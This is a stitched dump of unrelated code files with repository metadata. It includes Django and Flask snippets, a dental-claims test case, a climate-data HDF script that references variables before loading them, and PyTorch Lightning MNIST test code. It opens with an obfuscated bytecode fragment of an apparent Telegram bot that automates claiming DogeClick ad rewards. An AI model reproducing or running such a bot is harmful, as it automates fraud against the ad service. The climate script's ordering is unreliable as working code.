(%d)\rz\x08%H:%M:%Sz\x12\x1b[1;91mFALSE\x1b[0;0mz\x1e\x1b[1;92m\x1b[1;92mTRUE\x1b[0;0m\x1b[0;0m\xe9\xc8\x00\x00\x00z\tdata-codez\ndata-timerz\ndata-tokenz\x1bhttp://dogeclick.com/reward)\x02\xda\x04codeZ\x05tokenF)\x03r\x14\x00\x00\x00r/\x00\x00\x00r0\x00\x00\x00z\x11\x1b[1;92mTRUE\x1b[0;0mrN\x00\x00\x00)\x01r\x14\x00\x00\x00r1\x00\x00\x00\xe9\x03\x00\x00\x00)\x1e\xda\x0foriginal_updaterB\x00\x00\x00r\x04\x00\x00\x00\xda\x07hasattr\xda\x07messagerO\x00\x00\x00r\x05\x00\x00\x00rC\x00\x00\x00r"\x00\x00\x00r9\x00\x00\x00r\x0f\x00\x00\x00\xda\x04findr;\x00\x00\x00r<\x00\x00\x00r=\x00\x00\x00r\x0e\x00\x00\x00r \x00\x00\x00r!\x00\x00\x00r\x16\x00\x00\x00rA\x00\x00\x00\xda\x03intr\x15\x00\x00\x00Z\x04postr2\x00\x00\x00\xda\x0bbotcallbackrQ\x00\x00\x00Z\x04Khcj\xda\x06encoder>\x00\x00\x00r?\x00\x00\x00)\x0e\xda\x05eventZ\x04Khcbr5\x00\x00\x00Z\x04KhcyZ\x04KhcDr7\x00\x00\x00r8\x00\x00\x00Z\x04KhcSZ\x02cc\xda\x02ttZ\x04KhciZ\x04KhcVZ\x04KhcfZ\x04KhcE)\x01\xda\x04Khclr\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPkc\x00\x00\x00s>\x00\x00\x00\x00\x01\x06\x01\x0e\x01 \x01\x0c\x01\n\x01\x08\x01\x04\x01\x04\x01\x04\x01\x0c\x01\n\x01\x10\x01\x10\x01\x08\x01,\x01\x04\x01\x1e\x01\n\x01\n\x01\n\x01\x0c\x01\x18\x01\x04\x01\x14\x010\x01\n\x01\x16\x01\x0e\x01\x02\x01\x08\x01z\x12KhPF.<locals>.KhPkT)\x02\xda\x08incoming\xda\x05chatsc\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x93\x00\x00\x00s*\x00\x00\x00t\x00t\x01d\x01\x17\x00t\x02\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00\x88\x00\xa0\x03\xa1\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x03Nz\x1aAds not available detectedZ\rDisconnecting)\x04r"\x00\x00\x00\xda\x04KhPd\xda\x04KhPGZ\ndisconnect)\x01r\\\x00\x00\x00)\x01r^\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPL\x84\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x10\x01\x08\x01z\x12KhPF.<locals>.KhPLz&Sorry, there are no new ads available.)\x03r`\x00\x00\x00ra\x00\x00\x00Z\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x00\x00\x00s \x00\x00\x00t\x00|\x00j\x01\x83\x01r\x1ct\x02t\x03|\x00j\x04\x17\x00d\x01\x17\x00\x83\x01\x01\x00d\x00S\x00)\x02NrD\x00\x00\x00)\x05rB\x00\x00\x00rU\x00\x00\x00r"\x00\x00\x00\xda\x04KhPqZ\x08raw_text)\x01r\\\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPe\x89\x00\x00\x00s\x04\x00\x00\x00\x00\x01\n\x01z\x12KhPF.<locals>.KhPez\nYou earned)#\xda\x02os\xda\x04path\xda\x06exists\xda\x05mkdirrI\x00\x00\x00r)\x00\x00\x00r;\x00\x00\x00\xda\x04argvr\x1f\x00\x00\x00r3\x00\x00\x00r\x1d\x00\x00\x00\xda\x05startZ\x06get_meZ\nfirst_nameZ\x08usernamerQ\x00\x00\x00r\x1a\x00\x00\x00Z\nget_entityZ\x07creator\xda\nchusername\xda\x04joinZ\x06randomZ\x07choicesZ\x06stringZ\x06digitsr\n\x00\x00\x00\xda\nValueErrorr\x08\x00\x00\x00r\x0b\x00\x00\x00r"\x00\x00\x00Z\x0csend_messageZ\x11add_event_handlerr\x03\x00\x00\x00Z\nNewMessageZ\x16run_until_disconnected)\x06\xda\x02meZ\x04KhcJr]\x00\x00\x00r_\x00\x00\x00rd\x00\x00\x00rf\x00\x00\x00r\x18\x00\x00\x00)\x01r^\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPFE\x00\x00\x00sH\x00\x00\x00\x00\x01\x0c\x01\n\x01\x06\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x0e\x01\x16\x01\x0e\x018\x01 \x01\x1e\x01\x02\x01\x10\x01\x08\x01*\x01\x06\x01\x12\x01\x14\x01\x06\x01\x02\x01\x18\x01\x08\x01\x16\x01\x10\x01\x06\x01\x08\x01\x12\x01\x0c \x16\x01\x0c\x04\x18\x01\x08\x03\x18\x01rq\x00\x00\x00)\x01N)\x01F)\x02r-\x00\x00\x00N)?Z\x08telethonr\x02\x00\x00\x00r\x03\x00\x00\x00Z\x11telethon.tl.typesr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00Z\x1etelethon.tl.functions.messagesr\x07\x00\x00\x00rZ\x00\x00\x00Z\x1dtelethon.tl.functions.accountr\x08\x00\x00\x00Z\x1etelethon.tl.functions.channelsr\t\x00\x00\x00rm\x00\x00\x00Z\x1ctelethon.errors.rpcerrorlistr\n\x00\x00\x00r\x0b\x00\x00\x00Z\x08coloramar\x0c\x00\x00\x00r\r\x00\x00\x00Z\x04KhcPZ\x05RESETrc\x00\x00\x00Z\x03REDrb\x00\x00\x00Z\x07MAGENTAZ\x04KhPnZ\x05GREENre\x00\x00\x00r\x0e\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00\xda\x02tbZ\x03bs4r\x0f\x00\x00\x00rg\x00\x00\x00\xda\x02rer>\x00\x00\x00r\x15\x00\x00\x00r;\x00\x00\x00Z\x07asyncioZ\x0eget_event_loopZ\x04KhPjZ\x04KhcAr\x1b\x00\x00\x00r\x1c\x00\x00\x00r2\x00\x00\x00\xda\x06system\xda\x04namer\x1a\x00\x00\x00r\x1d\x00\x00\x00r"\x00\x00\x00r,\x00\x00\x00r9\x00\x00\x00rA\x00\x00\x00rC\x00\x00\x00rI\x00\x00\x00rq\x00\x00\x00Z\x12run_until_complete\xda\x11KeyboardInterruptr\x18\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00sL\x00\x00\x00\x10\x01\x14\x01\x0c\x01\x0c\x01\x0c\x01\x10\x01\x10\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x0c\x010\x01\x06\x01\x06\x01\x04\x01\x04\x01\x08\x01\x1a\x01\x02\x01\x08\x02\n\x02\n\x05\x08\x04\n\x0c\x08\x04\x08\x06\x08\x06\x08I\x10\x01\x10\x01'))
|
[
"dindacgr2@gmail.com"
] |
dindacgr2@gmail.com
|
89af1b2212557b7e7be169b88220d18081782bf6
|
2e8e55636b879af65b7ba9753a8c11c8e30c0ebe
|
/src/controllers/__init__.py
|
47264b39f17e5098a44049263628533c83ccb74f
|
[] |
no_license
|
ScottBurleighHeads/Portfolio
|
9db72161589892bd8bfb844bd7b854709c5dba0f
|
2e2e1631ec98c096d9586af444aa0474b2b08cf5
|
refs/heads/main
| 2023-05-14T16:14:06.528988
| 2021-06-10T04:18:15
| 2021-06-10T04:18:15
| 351,339,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 248
|
py
|
from controllers.index import index
from controllers.aboutMe import aboutMe
from controllers.contact import contact
from controllers.project import project
registerable_controllers = [
index,
aboutMe,
contact,
project
]
|
[
"scottmcarpentry@gmail.com"
] |
scottmcarpentry@gmail.com
|
c031f3295b1ed90617b561c8f7640b752aad51fd
|
af53fb6bd0cd0ff70c68e43482b49420f0262764
|
/odonto/odonto_submissions/supplier_testing/case_43.py
|
84c48fea337719163487c20c990d24e7a60d00b3
|
[] |
no_license
|
gmolate/odonto
|
34b41c18b972c7e10be46874a630c0016d6f7237
|
f198608c41e9b991550a7929d28eb10002a3a664
|
refs/heads/master
| 2020-12-08T00:47:43.903738
| 2019-04-30T15:19:18
| 2019-04-30T15:19:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,711
|
py
|
import datetime
from odonto.odonto_submissions.serializers import translate_to_bdcs1
from fp17 import treatments, exemptions
def annotate(bcds1):
bcds1.patient.surname = "CARTWRIGHT"
bcds1.patient.forename = "TOM"
bcds1.patient.address = ["40 HIGH STREET"]
bcds1.patient.sex = 'M'
bcds1.patient.date_of_birth = datetime.date(1978, 12, 31)
bcds1.date_of_acceptance = datetime.date(2017, 4, 1)
bcds1.date_of_completion = datetime.date(2017, 4, 1)
# "Universal Credit"
bcds1.exemption_remission = {
'code': exemptions.UNIVERSAL_CREDIT.EVIDENCE_SEEN,
}
# Treatments: "Examination, Extraction 1"
bcds1.treatments = [
treatments.EXAMINATION,
treatments.EXTRACTION(1),
# 'Band 4'
treatments.TREATMENT_CATEGORY_URGENT,
]
return bcds1
def from_model(bcds1, patient, episode):
demographics = patient.demographics()
demographics.surname = "CARTWRIGHT"
demographics.first_name = "TOM"
demographics.house_number_or_name = "40"
demographics.street = "HIGH STREET"
demographics.sex = "Male"
demographics.date_of_birth = datetime.date(1978, 12, 31)
demographics.save()
episode.fp17exemptions_set.update(
universal_credit=True,
evidence_of_exception_or_remission_seen=True
)
episode.fp17clinicaldataset_set.update(
examination=True,
extractions=1
)
episode.fp17treatmentcategory_set.update(
urgent_treatment=True,
)
episode.fp17incompletetreatment_set.update(
date_of_acceptance=datetime.date(2017, 4, 1),
completion_or_last_visit=datetime.date(2017, 4, 1)
)
translate_to_bdcs1(bcds1, episode)
|
[
"fredkingham@gmail.com"
] |
fredkingham@gmail.com
|
463e34a0ed580f880b1b6faaa67e1eb98751a792
|
df6d070cf9b984d291dfe23df5b3dc11fe6a32ac
|
/old_scripts/CCCM/2010_dataset.py
|
c2154df67f5ef4e2877280570cc030a44c4b5279
|
[] |
no_license
|
tristanohanlon/climate-analysis
|
5a439e4f08d6cae5a0f6cfec9bb5c5e4f59f122b
|
7e8a97cf83a308772cc7bc3081b3f117cc0eeb6d
|
refs/heads/master
| 2023-02-12T13:15:22.995914
| 2021-01-09T20:32:19
| 2021-01-09T20:32:19
| 184,121,830
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,476
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 5 09:26:33 2019
@author: Tristan O'Hanlon
"""
import time
import numpy as np
import os
from pyhdf import SD
import h5py
import matplotlib.pyplot as plt
###############################################################################
cccm21_cloud_free_area = []
cccm34_phase = []
cccm52_cloud_fraction_profile = []
start = time.time()
# The directory where your HDF files are stored
os.chdir('d:/Downloads/CCCM/2010') # Home PC
# Load every file in the directory
for filename in os.listdir():
# Load the file
f = SD.SD(filename)
# cccm21_cloud_free_area = cccm21_cloud_free_area + f.select('Cloud free area percent coverage (CALIPSO-CloudSat)').get().tolist()
# cccm34_phase = cccm34_phase + f.select('Mean group cloud particle phase from MODIS radiance (3.7)').get().tolist()
# cccm52_cloud_fraction_profile = cccm52_cloud_fraction_profile + f.select('Cloud fraction profile').get().tolist()
end = time.time()
print('Importing data from files to lists took:', end - start, 's')
start = time.time()
cccm21_cloud_free_area = np.array(cccm21_cloud_free_area)
cccm34_phase = np.array(cccm34_phase)
cccm52_cloud_fraction_profile = np.array(cccm52_cloud_fraction_profile)
end = time.time()
print('Create arrays took:', end - start, 's')
############################################################################### Save raw data
# specify path and file name to create
with h5py.File('2010_raw_data.h5', 'w') as p:
p.create_dataset('cccm21_cloud_free_area', data=cccm21_cloud_free_area)
p.create_dataset('cccm34_phase', data=cccm34_phase)
p.create_dataset('cccm52_cloud_fraction_profile', data=cccm52_cloud_fraction_profile)
p.close()
############################################################################### Load raw data
"""
import h5py
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
f = h5py.File('2010_raw_data.h5', 'r')
#cccm21_cloud_free_area = f['cccm21_cloud_free_area'][:]
#cccm34_phase = f['cccm34_phase'][:]
cccm52_cloud_fraction_profile = f['cccm52_cloud_fraction_profile'][:]
f.close()
"""
############################################################################### Get Southern Ocean Data - get lat first
# Join the two lists as if they were two columns side by side, into a list of two elements each
a = np.vstack(lat)
combined = np.hstack((a, cccm52_cloud_fraction_profile))
#print ("combined")
#print (combined)
# Add a column for every additional column, -1 will sort by the first column
combined = combined[np.lexsort(np.transpose(combined)[:-1])]
#print ("sorted")
#print (combined)
#Select latitudes over the southern ocean
combined = combined[combined[:,0]>=-70]
combined = combined[combined[:,0]<=-50]
#Split the combined array into just the lw data, eliminating the first coloumn of latitude
cccm52_cloud_fraction_profile_so = combined[:,1:114]
#alt = alt[0:137] #scale alt if necessary
############################################################################### Reduce and convert cloud free area to cloud area
cccm52_cloud_fraction_profile_alt = np.vstack((cccm121_alt, np.nanmean(cccm52_cloud_fraction_profile, axis = 0))).T
cccm52_cloud_fraction_profile_alt_so = np.vstack((cccm121_alt, np.nanmean(cccm52_cloud_fraction_profile_so, axis = 0))).T
cccm21_cloud_free_area = (100 - cccm21_cloud_free_area) / 100
############################################################################### Reduce cloud free area
# Join the two lists as if they were two columns side by side, into a list of two elements each
combined = np.vstack((lat, cccm21_cloud_free_area)).T
#print ("combined")
#print (combined)
#print("get unique lats")
unique = np.unique(lat)
#print(unique)
# Add a column for every additional column, -1 will sort by the first column
combined = combined[np.lexsort(np.transpose(combined)[:-1])]
#print ("sorted")
#print (combined)
# Averages of (lat, cloud ice water content) empty array
averages_total = unique.size
cccm_tcc_lat = np.empty((averages_total,2),dtype=float)
# Current subtotal of current lat
subtotal = 0.0
# Current number of cloud ice water content entries in subtotal
number = 0
# Set the current lat to false
current_lat = None
# Iterate through all of the (lat, cloud ice water content) elements and subtotal the same lat values
i = 0
for item in combined:
if np.isnan(item[1]):
continue
if current_lat is None:
"""
print("setting current_lat to item[0]")
print("(current_lat == item[0]) = ", end='')
print(current_lat == item[0])
"""
current_lat = item[0];
# If the lat is not the same as last time, then perform the average calc and reset everything
if item[0] != current_lat:
# Find the average value.
average = subtotal / number
"""
print("--------")
print("lat: ", end='')
print(current_lat, end='')
print(", avg: ", end='')
print(average, end='')
print(", subtotal: ", end='')
print(subtotal, end='')
print(", number: ", end='')
print(number)
"""
# Append the average
cccm_tcc_lat[i] = [current_lat, average]
# Reset the subtotal
subtotal = 0.0
number = 0
# Set the current latitude
current_lat = item[0]
# Move to the next index in the averages array
i+=1
# Add the next value to the subtotal
number+=1
subtotal+=item[1]
# Catch the last entry in the for loop
average = subtotal / number
cccm_tcc_lat[i] = [current_lat, average]
cccm21_cloud_area_fraction = cccm_tcc_lat
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
f = h5py.File('2010_CCCM.h5', 'r')
cccm81b_cloud_area_enhanced = f['tcc'][:]
f.close()
############################################################################### Save reduced data
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
with h5py.File('2010_cloud_fractions.h5', 'w') as p:
p.create_dataset('cccm21_cloud_area_fraction', data=cccm21_cloud_area_fraction)
p.create_dataset('cccm52_cloud_fraction_profile_alt', data=cccm52_cloud_fraction_profile_alt)
p.create_dataset('cccm52_cloud_fraction_profile_alt_so', data=cccm52_cloud_fraction_profile_alt_so)
p.create_dataset('cccm81b_cloud_area_enhanced', data=cccm81b_cloud_area_enhanced)
p.close()
############################################################################### Load reduced data
"""
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
f = h5py.File('2010_cloud_fractions.h5', 'r')
cccm21_cloud_area_fraction = f['cccm21_cloud_area_fraction'][:]
cccm52_cloud_fraction_profile_alt = f['cccm52_cloud_fraction_profile_alt'][:]
cccm52_cloud_fraction_profile_alt_so = f['cccm52_cloud_fraction_profile_alt_so'][:]
cccm81b_cloud_area_enhanced = f['cccm81b_cloud_area_enhanced'][:]
f.close()
"""
############################################################################### Load reduced phase data
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/') # Home PC
f = h5py.File('2010_cccm85_enhanced_lwc.h5', 'r')
cccm85_enhanced_lwc_lat = f['cccm85_enhanced_lwc_lat'][:]
cccm85_enhanced_lwc_alt = f['cccm85_enhanced_lwc_alt'][:]
cccm85_enhanced_lwc_alt_so = f['cccm85_enhanced_lwc_alt_so'][:]
cccm85_enhanced_lwc_alt = np.vstack((cccm123_alt, cccm85_enhanced_lwc_alt)).T
f.close()
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/') # Home PC
f = h5py.File('2010_cccm86_enhanced_iwc.h5', 'r')
cccm86_enhanced_iwc_lat = f['cccm86_enhanced_iwc_lat'][:]
cccm86_enhanced_iwc_alt = f['cccm86_enhanced_iwc_alt'][:]
cccm86_enhanced_iwc_alt_so = f['cccm86_enhanced_iwc_alt_so'][:]
f.close()
############################################################################### Create phase fraction data
tclw_frac = np.vstack((cccm85_enhanced_lwc_lat[:,0], (cccm85_enhanced_lwc_lat[:,1] / (cccm85_enhanced_lwc_lat[:,1] + cccm86_enhanced_iwc_lat[:,1])) * cccm21_cloud_free_area[:,1])).T
tciw_frac = np.vstack((cccm86_enhanced_iwc_lat[:,0], (cccm86_enhanced_iwc_lat[:,1] / (cccm85_enhanced_lwc_lat[:,1] + cccm86_enhanced_iwc_lat[:,1])) * cccm21_cloud_free_area[:,1])).T
"""
fig, ax = plt.subplots()
ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac, '-k')
#ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac81, '-b')
ax.plot(cccm85_enhanced_lwc_lat[:,0], tciw_frac, '--k')
ax.plot(cccm21_cloud_free_area[:,0], cccm21_cloud_free_area[:,1], '--b')
"""
lw_frac = np.vstack((cccm85_enhanced_lwc_alt[:,0], (cccm85_enhanced_lwc_alt[:,1] / (cccm85_enhanced_lwc_alt[:,1] + cccm86_enhanced_iwc_alt[:,1])) * cccm52_cloud_fraction_profile_alt[:,1])).T
iw_frac = np.vstack((cccm86_enhanced_iwc_alt[:,0], (cccm86_enhanced_iwc_alt[:,1] / (cccm85_enhanced_lwc_alt[:,1] + cccm86_enhanced_iwc_alt[:,1])) * cccm52_cloud_fraction_profile_alt[:,1])).T
"""
fig, ax = plt.subplots()
ax.plot(lw_frac, cccm52_cloud_fraction_profile_alt[:,0], '-k')
#ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac81, '-b')
ax.plot(iw_frac, cccm52_cloud_fraction_profile_alt[:,0], '--k')
ax.plot(cccm52_cloud_fraction_profile_alt[:,1], cccm52_cloud_fraction_profile_alt[:,0], '--b')
"""
lw_frac_so = np.vstack((cccm85_enhanced_lwc_alt_so[:,0], (cccm85_enhanced_lwc_alt_so[:,1] / (cccm85_enhanced_lwc_alt_so[:,1] + cccm86_enhanced_iwc_alt_so[:,1])) * cccm52_cloud_fraction_profile_alt_so[:,1])).T
iw_frac_so = np.vstack((cccm86_enhanced_iwc_alt_so[:,0], (cccm86_enhanced_iwc_alt_so[:,1] / (cccm85_enhanced_lwc_alt_so[:,1] + cccm86_enhanced_iwc_alt_so[:,1])) * cccm52_cloud_fraction_profile_alt_so[:,1])).T
############################################################################### Load Previous data
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets') # Home PC
f = h5py.File('2010_CCCM_profile_variables.h5', 'r')
lat = f['lat'][:]
cccm123_alt = f['alt'][:]
cccm121_alt = f['alt_c'][:]
cccm124_alt = f['alt_t'][:]
pressure_g = f['pressure_g_alt'][:]
pressure_so = f['pressure_so_alt'][:]
temp_g = f['temp_g_alt'][24:137]
temp_so = f['temp_so_alt'][24:137]
air_density_g = f['air_density_g'][:]
air_density_so = f['air_density_so'][:]
f.close()
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
f = h5py.File('2010_CCCM.h5', 'r')
tclw = f['tclw'][:]
tciw = f['tciw'][:]
cccm85_specific_lwc_alt = f['lw'][:]
cccm86_specific_iwc_alt = f['iw'][:]
cccm85_specific_lwc_alt_so = f['lw_so'][:]
cccm86_specific_iwc_alt_so = f['iw_so'][:]
cccm85_specific_lwc_temp = f['lw_t'][:]
cccm86_specific_iwc_temp = f['iw_t'][:]
cccm85_specific_lwc_temp_so = f['lw_t_so'][:]
cccm86_specific_iwc_temp_so = f['iw_t_so'][:]
f.close()
############################################################################### Create temperature data
cf_frac_temp = np.vstack((temp_g[:, 1], cccm52_cloud_fraction_profile_alt[:,1])).T
lw_frac_temp = np.vstack((temp_g[:, 1], lw_frac[:,1])).T
iw_frac_temp = np.vstack((temp_g[:, 1], iw_frac[:,1])).T
cf_frac_temp_so = np.vstack((temp_so[:, 1], cccm52_cloud_fraction_profile_alt_so[:,1])).T
lw_frac_temp_so = np.vstack((temp_so[:, 1], lw_frac_so[:,1])).T
iw_frac_temp_so = np.vstack((temp_so[:, 1], iw_frac_so[:,1])).T
############################################################################### Create new datasets
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
with h5py.File('2010_data_new.h5', 'w') as p:
p.create_dataset('lat', data=lat)
p.create_dataset('alt', data=cccm121_alt)
p.create_dataset('air_density_g', data=air_density_g)
p.create_dataset('air_density_so', data=air_density_so)
p.create_dataset('tcc', data=cccm21_cloud_area_fraction)
p.create_dataset('tclw', data=tclw)
p.create_dataset('tciw', data=tciw)
p.create_dataset('tclw_gcm3', data=cccm85_enhanced_lwc_lat)
p.create_dataset('tciw_gcm3', data=cccm86_enhanced_iwc_lat)
p.create_dataset('tclw_frac', data=tclw_frac)
p.create_dataset('tciw_frac', data=tciw_frac)
p.create_dataset('cf', data=cccm52_cloud_fraction_profile_alt)
p.create_dataset('cf_so', data=cccm52_cloud_fraction_profile_alt_so)
p.create_dataset('lw_frac', data=lw_frac)
p.create_dataset('lw_frac_so', data=lw_frac_so)
p.create_dataset('iw_frac', data=iw_frac)
p.create_dataset('iw_frac_so', data=iw_frac_so)
p.create_dataset('lw', data=cccm85_specific_lwc_alt)
p.create_dataset('lw_so', data=cccm85_specific_lwc_alt_so)
p.create_dataset('iw', data=cccm86_specific_iwc_alt)
p.create_dataset('iw_so', data=cccm86_specific_iwc_alt_so)
p.create_dataset('temp', data=temp_g)
p.create_dataset('temp_so', data=temp_so)
p.create_dataset('pressure', data=pressure_g)
p.create_dataset('pressure_so', data=pressure_so)
p.create_dataset('lw_t', data=cccm85_specific_lwc_temp)
p.create_dataset('lw_t_so', data=cccm85_specific_lwc_temp_so)
p.create_dataset('iw_t', data=cccm86_specific_iwc_temp)
p.create_dataset('iw_t_so', data=cccm86_specific_iwc_temp_so)
p.create_dataset('cf_t', data=cf_frac_temp)
p.create_dataset('cf_t_so', data=cf_frac_temp_so)
p.create_dataset('lw_frac_temp', data=lw_frac_temp)
p.create_dataset('lw_frac_temp_so', data=lw_frac_temp_so)
p.create_dataset('iw_frac_temp', data=iw_frac_temp)
p.create_dataset('iw_frac_temp_so', data=iw_frac_temp_so)
p.close()
############################################################################### Test plots
"""
fig, ax = plt.subplots()
ax.plot(tclw_frac[:,0], tclw_frac[:, 1], '-k')
ax.plot(tciw_frac[:,0], tciw_frac[:, 1], '--k')
ax.plot(cccm21_cloud_free_area[:,0], cccm21_cloud_free_area[:,1], '--b')
fig, ax = plt.subplots()
ax.plot(lw_frac_so[:,1], lw_frac_so[:, 0], '-k')
ax.plot(iw_frac_so[:,1], iw_frac_so[:, 0], '--k')
ax.plot(cccm52_cloud_fraction_profile_alt_so[:,1], cccm52_cloud_fraction_profile_alt_so[:,0], '-b')
fig, ax = plt.subplots()
ax.plot(lw_frac_temp[:,0], lw_frac_temp[:, 1], '-k')
ax.plot(iw_frac_temp[:,0], iw_frac_temp[:, 1], '--k')
ax.plot(cf_frac_temp[:,0], cf_frac_temp[:,1], '-b')
fig, ax = plt.subplots()
ax.plot(lw_frac_temp[:,0], lw_frac_temp[:, 1], '-k')
ax.plot(lw_frac_temp_so[:,0], lw_frac_temp_so[:, 1], '--k')
"""
|
[
"tristan.ohanlon@gmail.com"
] |
tristan.ohanlon@gmail.com
|
18127fdf9c9f5cca291bd624b9c70e6873dac44b
|
c44540782ad0bfc0421b8acccf37c941a676ac0e
|
/package.py
|
931df5f46a2d9ffbb1cf2a96df26f9f3d1d9e90d
|
[] |
no_license
|
pepetorres1998/tso_activity_2
|
b2629c2fd03bc9e615df18337ae1e60a740b554a
|
6a90f56bddec11ac5cd7bef373b8bace10df3117
|
refs/heads/master
| 2020-07-12T10:22:06.059267
| 2019-08-28T18:15:27
| 2019-08-28T18:15:27
| 204,791,667
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
class Package:
def __init__(self, max_weight):
self.elements = []
self.weight = 0
self.value = 0
self.max_weight = max_weight
def add_element(self, element):
if(element.weight + self.weight <= self.max_weight):
self.elements.append(element)
self.value += element.value
self.weight += element.weight
|
[
"jtorres@syscap.com.mx"
] |
jtorres@syscap.com.mx
|
e18b85bf87a5b4bf43d8dd5767ab31b021f0aeb5
|
10cc60ed8a2f65de1ce0bb54afe6ea66c15596f0
|
/crops/migrations/0003_auto_20150810_2312.py
|
69893feef074438bd27e3097536f58e6f2fa28b1
|
[] |
no_license
|
sammyteahan/sfg-server
|
896340e058fb2a6422079bb47ffa552593d2df3d
|
b655bdfe26197227f9576ed825b65ef05f7ebe4e
|
refs/heads/master
| 2020-04-05T22:57:02.015493
| 2017-04-09T18:57:20
| 2017-04-09T18:57:20
| 40,629,302
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('crops', '0002_auto_20150809_0304'),
]
operations = [
migrations.AlterField(
model_name='crop',
name='tier',
field=models.CharField(default=b'1', max_length=255, choices=[(b'1', b'Tier 1'), (b'2', b'Tier 2'), (b'3', b'Tier 3')]),
),
]
|
[
"sam.teahan@aggiemail.usu.edu"
] |
sam.teahan@aggiemail.usu.edu
|
79d2d7e1e1faba7d6c94883f29e01293b580434f
|
00d7824d2699fc7a90de167e04ff49a210458f2c
|
/tests/base/datasets.py
|
fd9e0b5672f766bd4ea76762fd4259aa91bdc98d
|
[
"Apache-2.0",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
jtamir/pytorch-lightning
|
867feab3062ed2e3357b640588220efde349f97b
|
9b89a24b04dff50c0595c5399e9ba61b39745def
|
refs/heads/master
| 2021-07-10T19:40:53.410989
| 2020-11-04T05:59:16
| 2020-11-04T06:00:28
| 213,468,663
| 1
| 0
|
Apache-2.0
| 2019-10-07T19:28:07
| 2019-10-07T19:28:06
| null |
UTF-8
|
Python
| false
| false
| 8,570
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import random
import time
import urllib.request
from typing import Tuple, Optional, Sequence
import torch
from torch import Tensor
from torch.utils.data import Dataset
from tests import PACKAGE_ROOT
#: local path to test datasets
PATH_DATASETS = os.path.join(PACKAGE_ROOT, 'Datasets')
class MNIST(Dataset):
"""
Customized `MNIST <http://yann.lecun.com/exdb/mnist/>`_ dataset for testing Pytorch Lightning
without the torchvision dependency.
Part of the code was copied from
https://github.com/pytorch/vision/blob/build/v0.5.0/torchvision/datasets/mnist.py
Args:
root: Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train: If ``True``, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
normalize: mean and std deviation of the MNIST dataset.
download: If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
Examples:
>>> dataset = MNIST(download=True)
>>> len(dataset)
60000
>>> torch.bincount(dataset.targets)
tensor([5923, 6742, 5958, 6131, 5842, 5421, 5918, 6265, 5851, 5949])
"""
RESOURCES = (
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/training.pt",
"https://pl-public-data.s3.amazonaws.com/MNIST/processed/test.pt",
)
TRAIN_FILE_NAME = 'training.pt'
TEST_FILE_NAME = 'test.pt'
cache_folder_name = 'complete'
def __init__(self, root: str = PATH_DATASETS, train: bool = True,
normalize: tuple = (0.5, 1.0), download: bool = True):
super().__init__()
self.root = root
self.train = train # training set or test set
self.normalize = normalize
self.prepare_data(download)
if not self._check_exists(self.cached_folder_path):
raise RuntimeError('Dataset not found.')
data_file = self.TRAIN_FILE_NAME if self.train else self.TEST_FILE_NAME
self.data, self.targets = _try_load(os.path.join(self.cached_folder_path, data_file))
def __getitem__(self, idx: int) -> Tuple[Tensor, int]:
img = self.data[idx].float().unsqueeze(0)
target = int(self.targets[idx])
if self.normalize is not None:
img = normalize_tensor(img, mean=self.normalize[0], std=self.normalize[1])
return img, target
def __len__(self) -> int:
return len(self.data)
@property
def cached_folder_path(self) -> str:
return os.path.join(self.root, 'MNIST', self.cache_folder_name)
def _check_exists(self, data_folder: str) -> bool:
existing = True
